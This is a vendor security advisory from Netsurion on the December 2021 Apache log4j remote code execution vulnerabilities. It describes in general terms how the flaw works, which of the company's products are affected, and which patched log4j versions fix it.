Powerful threat prediction, prevention, detection, and response along with compliance in a scalable, simple managed solution.
All-in-one networking solution that combines network connectivity, agility, security, and compliance in an affordable managed solution.
Accelerate business growth through our award-winning partner program.
Updated: Dec 18, 2021
On Dec. 9, 2021, a remote code execution (RCE) vulnerability CVE-2021-44228 in Apache log4j 2 was identified, and attackers are already actively exploiting this vulnerability. On Dec. 14, 2021, a second vulnerability CVE-2021-45046 was announced and fixed in log4j v2.16.0 and v2.12.2. A third vulnerability CVE-2021-450105 was announced and fixed in log4j v2.17.0.
Netsurion’s EventTracker v9 core code does not use the Apache log4j library. Our analysis shows no components of EventTracker v9.3 are affected by this vulnerability.
Note: EventTracker v9.3 incorporates ElasticSearch v7.2.1. A scan of the installation will show Program Files\Elasticsearch-7.2.1\lib\log4j-core-2.11.1.jar, which may be considered vulnerable. However, this is not exploitable and does not require urgent remediation.
Netsurion’s proprietary BranchSDO CXD platform also does not use Apache log4j and is therefore unaffected. However, other third-party hardware managed by Netsurion may be potentially impacted. We are awaiting full analysis by each respective vendor and will address any potential vulnerabilities as they are identified.
A.N. Ananth, President and Chief Strategy Officer, explains the background, context and consequences of this exploit, and the appropriate steps to defend against it.
Watch the Video
Updated information on mitigation techniques.
A.N. Ananth, President and Chief Strategy Officer, demonstrates how the Netsurion Managed Threat Protection service predicts, prevents, and detects attacks on vulnerable log4j instances in your monitored network.
Apache log4j 2 is an open-source Java-based logging framework that is leveraged within numerous Java applications. The Apache log4j library allows for developers to log various data within their application. In certain circumstances, the data being logged originates from user input. Should this user input contain special characters and be subsequently logged within the context of log4j, the Java method lookup will finally be called to execute the user-defined remote Java class in the Lightweight Directory Access Protocol (LDAP) server. This will in turn lead to RCE on the victim’s server that uses the vulnerable log4j 2 instance.
Public Proof of Concept (PoC) code was released, and subsequent investigation revealed that exploitation was easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct the system to download and execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched. Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking out and exploiting unpatched systems.
Apache Log4j 2.x <= 2.15.0-rc1
Apache has released 2.17.0 (for Java8 and up) which address CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.
The CVE-2021-44228 vulnerability is still being actively investigated in order to properly identify the full scope severity. Given the information currently available, this vulnerability may have a high impact at present and in the near future. Most of the applications affected are widely used in corporate networks. Users are encouraged to take all necessary steps to ensure they are protected against this vulnerability.